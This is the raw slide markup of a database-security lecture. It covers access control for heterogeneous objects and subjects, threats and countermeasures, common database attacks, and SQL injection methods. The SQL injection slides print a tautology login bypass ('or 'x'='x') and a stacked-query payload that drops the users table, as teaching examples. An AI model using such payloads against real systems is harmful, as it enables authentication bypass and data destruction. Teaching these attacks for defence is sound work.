              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>that go beyond traditional DBMSs.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resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> to be protected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not only traditional data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>but also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knowledge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experience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The access control mechanism should be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flexible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> enough to support a wide spectrum of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heterogeneous protection objects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000" dirty="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52230" name="群組 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2777389" y="4130728"/>
            <a:ext cx="1180097" cy="808581"/>
            <a:chOff x="2530136" y="5299969"/>
            <a:chExt cx="1162975" cy="807868"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52235" name="流程圖: 磁碟 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2530136" y="5299969"/>
              <a:ext cx="1162975" cy="807868"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk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52236" name="文字方塊 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2672177" y="5495273"/>
              <a:ext cx="9854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data</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US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52231" name="群組 9"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4413726" y="4051300"/>
            <a:ext cx="1415471" cy="967438"/>
            <a:chOff x="4580881" y="5237823"/>
            <a:chExt cx="1393791" cy="967666"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52233" name="流程圖: 磁碟 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4580881" y="5237823"/>
              <a:ext cx="1349405" cy="967666"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartMagneticDisk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52234" name="文字方塊 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4651897" y="5495273"/>
              <a:ext cx="13227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TW" sz="1800" b="1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knowledge</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1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experience</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="18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52232" name="文字方塊 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2416174" y="5027916"/>
            <a:ext cx="39007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baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Various types of objects to be protected</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" b="1" baseline="0" dirty="0"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7049" y="5848014"/>
            <a:ext cx="3224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(heterogeneous objects)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" baseline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4C6559-14C5-421E-AFC7-0E646B666E80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Access Control Policies for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> E-Commerce and the Web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22415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Another requirement is related to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heterogeneity of subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, which requires access control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policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> based on user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characteristics and qualifications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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0066"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>credential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1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set of properties </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>concerning a user that are relevant for security purposes (e.g.,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age, position, or role within an organization)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By using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credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, one can formulate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policies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> such as</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53253" name="群組 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1273175" y="4525963"/>
            <a:ext cx="6338888" cy="1516922"/>
            <a:chOff x="1273175" y="4525963"/>
            <a:chExt cx="6338888" cy="1516922"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="53255" name="Picture 6" descr="檢視詳細資料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3600" y="4556125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25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73175" y="4597400"/>
              <a:ext cx="534988" cy="8731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325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0425" y="4597400"/>
              <a:ext cx="484188" cy="844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3258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05463" y="4597400"/>
              <a:ext cx="671512" cy="7635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3259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6963" y="4583113"/>
              <a:ext cx="828675" cy="8175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3260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81800" y="4525963"/>
              <a:ext cx="830263" cy="9445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53261" name="文字方塊 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2876550" y="5580922"/>
              <a:ext cx="32474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400" b="1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Heterogeneous subjects</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" b="1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07899" y="3522078"/>
            <a:ext cx="7297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TW" sz="2000" b="1" i="1" kern="0" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Policy A: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Only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b="1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permanent staff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with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b="1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five or more years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of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service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can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b="1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access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documents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related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to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i="1" kern="0" baseline="0" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>the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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1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internals of the system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" kern="0" baseline="0" dirty="0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.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61139" y="5470525"/>
            <a:ext cx="90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600" baseline="0" dirty="0"/>
              <a:t>60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0" dirty="0"/>
              <a:t>CEO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0" dirty="0"/>
              <a:t>manager</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" baseline="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90035" y="5502930"/>
            <a:ext cx="9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TW" sz="1600" baseline="0" dirty="0"/>
              <a:t>65</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0" dirty="0"/>
              <a:t>teacher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0" dirty="0"/>
              <a:t>customer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" baseline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370814-BD3C-4034-A886-33380C3892EB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Threats and Countermeasures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496300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Threats to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Loss of integrity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Unauthorized changes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made to the data by intentional or accidental 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Loss of availability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Data unavailable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to users to which they have a legitimate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Loss of confidentiality</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" b="1">
              <a:ea typeface="新細明體" charset="-120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Refer to the protection of data from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unauthorized disclosure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Four kinds of countermeasures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access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inference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encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16389" name="群組 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4052888" y="4487863"/>
            <a:ext cx="2422525" cy="1738312"/>
            <a:chOff x="5184775" y="4665663"/>
            <a:chExt cx="2422525" cy="1738312"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1639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30950" y="4665663"/>
              <a:ext cx="1276350" cy="1504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16391" name="群組 7"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5184775" y="5246688"/>
              <a:ext cx="966788" cy="1157287"/>
              <a:chOff x="5184775" y="5246688"/>
              <a:chExt cx="966788" cy="1157287"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16392" name="圓柱 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5184775" y="5246688"/>
                <a:ext cx="966788" cy="1157287"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 25033"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050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609600" indent="-609600"/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393" name="文字方塊 6"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5264457" y="5708342"/>
                <a:ext cx="84271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TW" sz="2400" b="1" baseline="0">
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" b="1" baseline="0">
                  <a:ea typeface="新細明體" charset="-120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>
          <a:xfrm>
            <a:off x="284163" y="122239"/>
            <a:ext cx="8774112" cy="645316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</a:rPr>
              <a:t>Frequent Attacks on Databases</a:t>
            </a:r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284163" y="920008"/>
            <a:ext cx="8774112" cy="4943311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charset="-120"/>
              </a:rPr>
              <a:t>SQL Injection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Unauthorized Privilege Escalation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An individual attempting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elevate his privilege </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>by attacking vulnerable points in DBMS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Denial of Service (DOS) Attack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To make resources unavailable to its intended users by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overflowing the buffer or consuming resources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Weak Authentication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If the user authentication scheme is weak, an attacker can impersonate the identity of a legitimate user by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obtaining their login credentials</a:t>
            </a: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64491" y="6386513"/>
            <a:ext cx="593783" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9CB80BCD-80D6-4654-B132-4EA960D82A9E}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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208166" y="5473261"/>
            <a:ext cx="2613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</a:rPr>
              <a:t>Passwords:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>abcde</a:t>
            </a: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, 12345678, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tel</a:t>
            </a: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#, birthdate, qwerty, …</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline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6036157" y="5520177"/>
            <a:ext cx="2932054" cy="1030302"/>
            <a:chOff x="6036157" y="5520177"/>
            <a:chExt cx="2932054" cy="1030302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036157" y="5714878"/>
              <a:ext cx="7327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charset="-120"/>
                </a:rPr>
                <a:t>Server</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="160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7108280" y="5520177"/>
              <a:ext cx="10165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charset="-120"/>
                </a:rPr>
                <a:t>Zombies</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="16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6262010" y="5800129"/>
              <a:ext cx="140721" cy="45735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9" name="橢圓 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6330964" y="6055973"/>
              <a:ext cx="221135" cy="189598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7437423" y="5845863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7437423" y="5998317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7437423" y="6150772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7437423" y="6303226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437423" y="6455680"/>
              <a:ext cx="228475" cy="94799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  <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="28" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="12" idx="1"/>
              <a:endCxn id="9" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6552099" y="5893263"/>
              <a:ext cx="885324" cy="257509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29" name="直線單箭頭接點 21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6563559" y="6045717"/>
              <a:ext cx="873864" cy="84544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0" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="14" idx="1"/>
              <a:endCxn id="9" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="6552099" y="6150772"/>
              <a:ext cx="885324" cy="47400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1" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="15" idx="1"/>
              <a:endCxn id="9" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="6552099" y="6150772"/>
              <a:ext cx="885324" cy="199854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2" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="16" idx="1"/>
              <a:endCxn id="9" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="6552099" y="6150772"/>
              <a:ext cx="885324" cy="352308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sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="橢圓 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="8115616" y="6074305"/>
              <a:ext cx="221135" cy="189598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 baseline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8072132" y="5748512"/>
              <a:ext cx="8960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charset="-120"/>
                </a:rPr>
                <a:t>Attacker</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="21" idx="6"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7665898" y="5878756"/>
              <a:ext cx="449718" cy="290348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26" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="21" idx="6"/>
              <a:endCxn id="16" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="7665898" y="6169104"/>
              <a:ext cx="449718" cy="333976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3" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="21" idx="6"/>
              <a:endCxn id="13" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="7665898" y="6045717"/>
              <a:ext cx="449718" cy="123387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4" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="21" idx="6"/>
              <a:endCxn id="14" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="7665898" y="6169104"/>
              <a:ext cx="449718" cy="29068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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="直線單箭頭接點 21"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="21" idx="6"/>
              <a:endCxn id="15" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="7665898" y="6169104"/>
              <a:ext cx="449718" cy="181522"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1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charset="-120"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Injection Methods</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRP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>
          <a:xfrm>
            <a:off x="284163" y="1158875"/>
            <a:ext cx="8774112" cy="30607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Attacker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injects a string input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>thru the application, which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changes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manipulate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> the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SQL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statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> to the attacker’s advantage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>SQL Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Code Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Function Call Injection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4CF1F2-35FE-4378-AE39-A106266F8BAB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SQL Manipulation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 manipulation attack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changes an SQL command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>in the application	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct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SELECT *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FROM users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WHERE username = ‘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jake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’ and PASSWORD = ‘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jakepasswd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’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attacker can use the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct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SELECT *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FROM users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	WHERE username = ‘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jake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’ and PASSWORD = ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>jakepasswd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>’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or ‘x’ = ‘x’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400521-DFAA-4C87-83B8-2DE8ECC5986A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Code Injection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284163" y="1017588"/>
            <a:ext cx="8774112" cy="27559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Code injection attack attempts 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add additional SQL statements or commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>to the existing SQL statement by exploiting a computer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bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, which is caused by processing invalid data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Code injection is a popular technique for system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hacking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cracking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> to gain information.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:ea typeface="新細明體" charset="-12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AEE856-2585-4CD6-B46D-290098E72BC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56325" name="矩形 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="239713" y="4017963"/>
            <a:ext cx="8815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statement = "SELECT * FROM users WHERE name = ' "+ userName +" ';" </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0" dirty="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56326" name="矩形 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="133350" y="4598988"/>
            <a:ext cx="83629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aseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>The hacker input the following for the variable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1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userName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" baseline="0" dirty="0" err="1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a';DROP</a:t>
            </a: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 TABLE users; SELECT * FROM userinfo WHERE 't' = 't </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0" dirty="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56327" name="矩形 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="293688" y="5465763"/>
            <a:ext cx="7597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aseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>The SQL statement becomes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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SELECT * FROM users WHERE name = '</a:t>
            </a:r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a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" baseline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rPr>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57352" name="直線接點 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5923807" y="4418013"/>
            <a:ext cx="17589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7353" name="向下箭號 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
